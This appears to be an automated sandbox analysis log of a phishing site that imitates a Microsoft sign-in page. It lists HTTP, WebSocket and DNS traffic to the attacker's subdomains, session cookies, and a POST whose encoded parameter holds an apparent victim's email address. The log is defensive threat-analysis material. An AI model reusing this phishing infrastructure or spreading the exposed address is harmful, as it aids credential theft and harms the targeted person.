            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0Sec-WebSocket-Key: dQbDjazzT9LZ7NLXFmpahA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /sbo.co.at/winauth/ssoprobe?client-request-id=a1e188a0-68bf-4354-b37c-5c94feca2ce3&_=1733383463857 HTTP/1.1Host: 8cacc656-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /common/instrumentation/dssostatus HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: 33767741-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678Sec-WebSocket-Key: PyaJBLQVr+qsgncEF8gNKw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1Host: b1a4e5aa-3c4125ca.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; MC1="GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343"; MS0=2bfcefb984a14c6b991806c27d85da69
            Source: global trafficHTTP traffic detected: GET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678; MC1="GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343"; MS0=2bfcefb984a14c6b991806c27d85da69; MSFPC=GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343Sec-WebSocket-Key: Fz/IsdVu3LAgy+i40dmOEA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: google.dz
            Source: global trafficDNS traffic detected: DNS query: www.google.dz
            Source: global trafficDNS traffic detected: DNS query: alvoradavisual.com.br
            Source: global trafficDNS traffic detected: DNS query: djdjkdlellekkff.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 707242bf-3c4125ca.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 4b553e95-3c4125ca.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 33767741-3c4125ca.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: l1ve.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: c65af2e9-3c4125ca.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: 8cacc656-3c4125ca.gharelokhana.com
            Source: global trafficDNS traffic detected: DNS query: b1a4e5aa-3c4125ca.gharelokhana.com
            Source: unknownHTTP traffic detected: POST /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveContent-Length: 5056Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://djdjkdlellekkff.gharelokhana.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 07:23:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 2222f100-abf2-4c30-8be6-4ac878fe6700x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 3344aa90-3048-426d-b50a-4a36a6861400x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b5622b00-b2d4-4890-88b4-1342476b2e01x-ms-ests-server: 2.1.19568.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: no-store, no-cachex-ms-correlation-id: a3219723-066d-4229-8cd4-cbb387f7f5e1x-ua-compatible: IE=Edgex-cache: CONFIG_NOCACHEx-msedge-ref: Ref A: 9F26860A257F4B65A1943D025436D21D Ref B: AMS231032602037 Ref C: 2024-12-05T07:24:21Zaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: f91f7d07-a8b6-4ea0-9d5c-ed015223d000x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 487fd881-0237-4efa-abe9-0c41dd2e2b00x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: d0432388-0ecd-41f7-9c9c-d432494e8100x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:24:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 9e6b77ee-f371-4bab-aca6-17ae95b92f01x-ms-ests-server: 2.1.19568.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: classification engineClassification label: mal76.phis.win@18/57@34/7
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
